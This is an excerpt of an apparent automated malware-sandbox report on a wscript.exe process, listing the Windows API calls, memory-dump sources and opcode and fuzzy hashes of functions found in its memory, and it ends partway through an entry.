                                            • Opcode Fuzzy Hash: e475f961fa8a3ddf69cecf4ca0a6ed047704cab10902e3674a58d89db69f5878
                                            • Instruction Fuzzy Hash: CE115AB5200108AFDB24DF98CC81EEB77A9EF88350F118558F90CAB241CA34E911CBA0
                                            Function 0090ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0090AD62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: 3433e8aad13ef166e45f3c2da43e150c6288074684bb12c2ca2ab47acde1275b
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 7C011EB5E4020DBBDF10DBA4DC42FDDB3789B54708F004595A91997681F631EB548B91
                                            Function 0091A739 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0091A734
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 5d363e3e1a30e7819dfe0304856a86a8e6391b236d34ac4a95053095116e5cfb
                                            • Instruction ID: d4d05f4c45e105cdb7fd79faa8e48c79bfd6d95c9c3024f50ae5e2fc8ce17eb1
                                            • Opcode Fuzzy Hash: 5d363e3e1a30e7819dfe0304856a86a8e6391b236d34ac4a95053095116e5cfb
                                            • Instruction Fuzzy Hash: D9012CB62041496FCB04DFA8DC85CE77BA8EF88210B14865DF99987202C634E955CBB1
                                            Function 0091A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0091A734
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: a34c12c05e49571ceeb19652c01ef2c52d59007f7c144b3af92b81c168822967
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 7B01AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                            Function 009191B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0090F050,?,?,00000000), ref: 009191EC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                            • Instruction ID: aa38a542b16986c89d3cc2b31bb674a3fe58c5ea7706096a6d805eade8ae4cae
                                            • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                            • Instruction Fuzzy Hash: 10E092773803083AE7306599AC03FE7B39CDBC1B20F140026FA0DEB2C1D995F84142A4
                                            Function 0091A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: e0b140ad7c184cf842f72d1d4951cb9066fb44dbe99a3e6960e59437a74e972e
                                            • Instruction ID: 8ebda6d46e2e0e9b57630bbaa6026e3ccf30d9cd67412db5f08e740a2c47545f
                                            • Opcode Fuzzy Hash: e0b140ad7c184cf842f72d1d4951cb9066fb44dbe99a3e6960e59437a74e972e
                                            • Instruction Fuzzy Hash: C0F06DB57002187FCB20DF58CC82FEB3B69EF85650F108155F94CAB251CA31A856CBB5
                                            Function 0090ACE4 Relevance: 1.5, APIs: 1, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0090AD62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction ID: 818594fcdee09d4ab24b0751660ca43b4e0782580009aeadb5822b854734c7f3
                                            • Opcode Fuzzy Hash: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction Fuzzy Hash: C0E065B5F0010DAFDF00CBA4D882F9DB778AB54708F008595E91896681E630E644CB92
                                            Function 0091A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00914536,?,00914CAF,00914CAF,?,00914536,?,?,?,?,?,00000000,00000000,?), ref: 0091A65D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: bd97ab39e561d024abf55773a68625291368c5fb870c65163a5f80bd06c23a1e
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: B3E012B1200208ABDB14EF99CC41EA777ACEF88664F118558BA085B242C630F9118AB0
                                            Function 0091A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: d85b2b2e87b26e879a3ebcdc4d786d1f7c43021d0b8a3d6c318cc0ebd629479d
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 3EE01AB12002086BDB10DF49CC85EE737ADEF88650F118154BA0C57241C930E8118BF5
                                            Function 0090F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,00908D14,?), ref: 0090F6FB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction ID: f86f4114469d6f547d88c5e355aaa0672902ac4a98f653013840d84641fb1b8c
                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction Fuzzy Hash: 01D05E657503082AE610AAA49C13F66328C6B44B00F490064F9489A2C3D950E5004165
                                            Function 04DA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 80bca368bdb73f837e92fc688cd2c008cd770af565ff980e042ee0f81aa37f2a
                                            • Instruction ID: db2a0235aee06adb99bb407bb35a79518e1a75932a118c34c98741afd7e1d48f
                                            • Opcode Fuzzy Hash: 80bca368bdb73f837e92fc688cd2c008cd770af565ff980e042ee0f81aa37f2a
                                            • Instruction Fuzzy Hash: FEB09B719015C5C5FB11F7604A0971779147BD0705F15C061E2431755E4738D1D1F5B5

                                            Non-executed Functions

                                            Function 009C544C Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 326librarystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserDefaultLCID.KERNEL32(?,?,00000000), ref: 009C5471
                                            • GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,?,?,00000000), ref: 009C548F
                                            • GetModuleFileNameW.KERNEL32(?,00000104,?,?,00000000), ref: 009C54F6
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009C551C
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000000), ref: 009C5535
                                            • LoadStringA.USER32(000003E9,?,00000104), ref: 009C556F
                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 009C55A7
                                            • CharNextA.USER32(?,?,?,?,?,00000000), ref: 009C55C8
                                            • memcpy.MSVCRT ref: 009C5606
                                            • strcpy_s.MSVCRT ref: 009C5620
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 009C5635
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 009C564F
                                            • sprintf_s.MSVCRT ref: 009C5692
                                            • CharNextA.USER32(?), ref: 009C56B6
                                            • memcpy.MSVCRT ref: 009C56F4
                                            • strcpy_s.MSVCRT ref: 009C570E
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C5721
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C573B
                                            • GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000), ref: 009C574B
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,?,?,00000000), ref: 009C5764
                                            • sprintf_s.MSVCRT ref: 009C578A
                                            • CharNextA.USER32(?), ref: 009C57AE
                                            • memcpy.MSVCRT ref: 009C57EC
                                            • strcpy_s.MSVCRT ref: 009C5804
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C5817
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C582D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeString
                                            • String ID: %s%s.DLL
                                            • API String ID: 2133840635-4110387156
                                            • Opcode ID: 5dc6e937fb895ea3a61512f2c45f95b58825e3b760167a3c1e51c7747f5fe4df
                                            • Instruction ID: 6975718a640e272d86d250c058285b8a3f033bc823d55d2084a17d1bf6d18aa2
                                            • Opcode Fuzzy Hash: 5dc6e937fb895ea3a61512f2c45f95b58825e3b760167a3c1e51c7747f5fe4df
                                            • Instruction Fuzzy Hash: 8DB1C172D0462DABCF22DB64CC49FEA77BDAB48700F0504D9E506E3151EA34EA85DBA1
                                            Function 009BB52D Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110memorywindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,009C2B68,00000000,00000000,00000104,?,?,00000000,00000000,?,009C2B68,?), ref: 009BB55A
                                            • LocalAlloc.KERNEL32(00000000,00000016,?,009C2B68,?), ref: 009BB56B
                                            • GetLastError.KERNEL32(?,009C2B68,?), ref: 009BB578
                                            • swprintf_s.MSVCRT ref: 009BB59F
                                            • FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,00000104,?,?,00000000,00000000,?,009C2B68,?), ref: 009BB5B6
                                            • LocalAlloc.KERNEL32(00000000,0000000B,?,009C2B68,?), ref: 009BB5C3
                                            • sprintf_s.MSVCRT ref: 009BB5D9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,009C2B68,?), ref: 009BB5EB
                                            • LocalAlloc.KERNEL32(00000000,00000000,?,009C2B68,?), ref: 009BB5FC
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,009C2B68,?), ref: 009BB616
                                            • SysAllocString.OLEAUT32(009C2B68), ref: 009BB627
                                            • LocalFree.KERNEL32(00000000,?,009C2B68), ref: 009BB638
                                            • LocalFree.KERNEL32(00000000), ref: 009BB647
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                            • String ID: 0x%8X$0x%8X
                                            • API String ID: 1583499379-4147741067
                                            • Opcode ID: f17367968a0fa7d4ac7e249f85b840503b00dd37c53edb0cd099c31a1710da7b
                                            • Instruction ID: 4771eb045a5585c669961b00ad274cc7262c24e1b72d52c8e4a147308a533f47
                                            • Opcode Fuzzy Hash: f17367968a0fa7d4ac7e249f85b840503b00dd37c53edb0cd099c31a1710da7b
                                            • Instruction Fuzzy Hash: 02319A31D14226FBEB228BA68D0DEEF7E7CEF45771F140155B411E21D0EBB08A00E6A0
                                            Function 009BB8C3 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 179registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C5846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                              • Part of subcall function 009C5846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74), ref: 009C589D
                                              • Part of subcall function 009C5846: GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000,?,?,?,009B8FB7,00000000,00000000), ref: 009C58AA
                                              • Part of subcall function 009C5846: __alloca_probe_16.LIBCMT ref: 009C58B4
                                              • Part of subcall function 009C5846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000), ref: 009C58C8
                                              • Part of subcall function 009C5846: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C58DF
                                            • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 009BB9C5
                                            • GetUserNameW.ADVAPI32(?,00000100), ref: 009BB9E7
                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 009BBA16
                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 009BBA7E
                                            • ReportEventW.ADVAPI32(?,00000008,00000000,00FF03E9,00000000,00000001,00000000,?,00000000), ref: 009BBAE5
                                            • DeregisterEventSource.ADVAPI32(?), ref: 009BBAF1
                                            • SysFreeString.OLEAUT32(00000000), ref: 009BBB0E
                                            • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 009BBB26
                                            • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 009BBB3B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser__alloca_probe_16
                                            • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                            • API String ID: 1647329903-2261343319
                                            • Opcode ID: 3828b14116b2f9908c15397be0576bf0dc79078597c27165caa4ce5d8d5a15ee
                                            • Instruction ID: d717cf014d5b482ca6e9b0d32779aaa97975e5228ea3e394010015de887285d6
                                            • Opcode Fuzzy Hash: 3828b14116b2f9908c15397be0576bf0dc79078597c27165caa4ce5d8d5a15ee
                                            • Instruction Fuzzy Hash: C1615B71D40229ABDB30DB649D8DFEEBABDEB88310F1041E9E50DA2191DB705E84DF60
                                            Function 009B91C6 Relevance: 16.7, APIs: 11, Instructions: 180memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysAllocString.OLEAUT32(009B3AF4), ref: 009B91FF
                                            • GetVersionExA.KERNEL32(?,00000000,009B10C4,00000000), ref: 009B923F
                                            • IsTextUnicode.ADVAPI32(?,?,?), ref: 009B926F
                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009B9345
                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00000000,00000000,009B10C4,00000000), ref: 009B9372
                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,00000000,00000000,009B10C4,00000000), ref: 009B937C
                                            • SysFreeString.OLEAUT32(00000000), ref: 009B93EC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
                                            • String ID:
                                            • API String ID: 1844124450-0
                                            • Opcode ID: 807208ff1736028bfe365048af651cd853a04880130a1a10b16fd33a9a72a7a4
                                            • Instruction ID: 5c8e3755b65dc6b68525f35f658854cd528971c85fe6e6044fde2ddc329ddca1
                                            • Opcode Fuzzy Hash: 807208ff1736028bfe365048af651cd853a04880130a1a10b16fd33a9a72a7a4
                                            • Instruction Fuzzy Hash: 1D51F971E24329EFDB308F658E49BEA7BB8AF16334F104099EA59D7280D7344D80DB61
                                            Function 009C79A0 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 009C79CD
                                            • GetCurrentProcessId.KERNEL32 ref: 009C79DC
                                            • GetCurrentThreadId.KERNEL32 ref: 009C79E5
                                            • GetTickCount.KERNEL32 ref: 009C79EE
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 009C7A03
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 89034a16d4e2ec863c3c56852d5b66c3f34b310446f1e77d3d7a31bb80dc34be
                                            • Instruction ID: 6388cf642dca8f45000082682ab3002253687f2edd0fad871662d3d7e9976b3c
                                            • Opcode Fuzzy Hash: 89034a16d4e2ec863c3c56852d5b66c3f34b310446f1e77d3d7a31bb80dc34be
                                            • Instruction Fuzzy Hash: 45110A71D28108EFCB10DBB9DA48A9EB7F8FF48314F550459D406E7250EB309A00DB51
                                            Function 009C1170 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 345COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WScript.CreateObject
                                            • API String ID: 0-1366894974
                                            • Opcode ID: ec0dd1ed487ba7677276cdebb51291f3b705ce5a2fa3f57efc7993dbbcc894f3
                                            • Instruction ID: 7ecbd3d688240f0f7b60cbc73d034c2f66e27ffd0aa277b639f517702ab90c26
                                            • Opcode Fuzzy Hash: ec0dd1ed487ba7677276cdebb51291f3b705ce5a2fa3f57efc7993dbbcc894f3
                                            • Instruction Fuzzy Hash: C5C1BC75A182029FC704DF24D895F2A77E9AFC9724F14442DF956873A2DB34EC02CB9A
                                            Function 009C08FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CLSIDFromProgID.OLE32(?,?), ref: 009C090E
                                            • CoCreateInstance.OLE32(?,00000000,00000015,009B3860,?), ref: 009C0998
                                              • Part of subcall function 009BB1AA: CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB1C7
                                              • Part of subcall function 009BB1AA: SysFreeString.OLEAUT32(009B3A24), ref: 009BB36D
                                              • Part of subcall function 009BB1AA: SysFreeString.OLEAUT32(009B73FB), ref: 009BB376
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CreateFreeString$ErrorFromInfoInstanceProg
                                            • String ID: WScript.CreateObject
                                            • API String ID: 3168253046-1366894974
                                            • Opcode ID: 5a2e8cebc0eee225f26e374054db10d7592b18f68154860ded7df73fb5acb89e
                                            • Instruction ID: 7d45a821cd7910f7f39b20ba7ed3bc1e18a3973575e06ccccef22b4219293017
                                            • Opcode Fuzzy Hash: 5a2e8cebc0eee225f26e374054db10d7592b18f68154860ded7df73fb5acb89e
                                            • Instruction Fuzzy Hash: 3011B136E40229FBEF115B88CD06FED7A259BD0734F108128FD046A2C3D6B1AE5097C2
                                            Function 009C6D75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,009C6DAD,00000000,00000000,009C6FF4,00000000,00000000,00000000,?,00000000,?), ref: 009C6D84
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 009C6D92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoad
                                            • String ID: MUI
                                            • API String ID: 2619053042-1339004836
                                            • Opcode ID: b5fae171e14f3aa1e85a2fc88e41e20e3517dd914c45215b8cfc71edb7dec2e4
                                            • Instruction ID: ee9af1a3cb46a0b16ad70eba32514437070911ba0c5553b979ed0620ba510ca4
                                            • Opcode Fuzzy Hash: b5fae171e14f3aa1e85a2fc88e41e20e3517dd914c45215b8cfc71edb7dec2e4
                                            • Instruction Fuzzy Hash: 3FD01231B4D2217AE62027157C0EFDB2A1DCB81775F050085F405950D1DB915C829295
                                            Function 009B9D9A Relevance: 4.7, APIs: 3, Instructions: 166memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateBindCtx.OLE32(00000000,?), ref: 009B9DCE
                                            • SysFreeString.OLEAUT32(00000000), ref: 009B9E84
                                            • SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 009B9EEE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$AllocBindByteCreateFree
                                            • String ID:
                                            • API String ID: 3716443497-0
                                            • Opcode ID: a07e543bcdeb430c4b16fd8b58553b5c25ab295b49ea970b182a46d1e69e079b
                                            • Instruction ID: 5142cec9cc1cc2d424c97ad0761a5a938fe5d34897de76d1e2bfdba10bddde88
                                            • Opcode Fuzzy Hash: a07e543bcdeb430c4b16fd8b58553b5c25ab295b49ea970b182a46d1e69e079b
                                            • Instruction Fuzzy Hash: 01515E71A24719DFDB10CF95D984A9DBBB9FF88724F21012DE606AB351CB75AC01CB80
                                            Function 009C7084 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 009C70A9
                                            • wcsncmp.MSVCRT(?,009B4540,00000003), ref: 009C70BE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: InfoLocalewcsncmp
                                            • String ID:
                                            • API String ID: 4128031126-0
                                            • Opcode ID: d6f7e53c186edb3149cf7395cacd62e2d61108bbff30ffa05399c6a35c026907
                                            • Instruction ID: 59a9d2a6001082e1896d560342d42c4904166a1b077e507624f544b781262682
                                            • Opcode Fuzzy Hash: d6f7e53c186edb3149cf7395cacd62e2d61108bbff30ffa05399c6a35c026907
                                            • Instruction Fuzzy Hash: 3DF027B1F542086BE710DBB59C0AFAEB3ECAB40B04F440124BA15E72C0EA70EE05D769
                                            Function 009C51BD Relevance: 2.5, APIs: 2, Instructions: 8memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,?,009B7D2F), ref: 009C51C6
                                            • HeapFree.KERNEL32(00000000), ref: 009C51CD
                                            Memory Dump Source
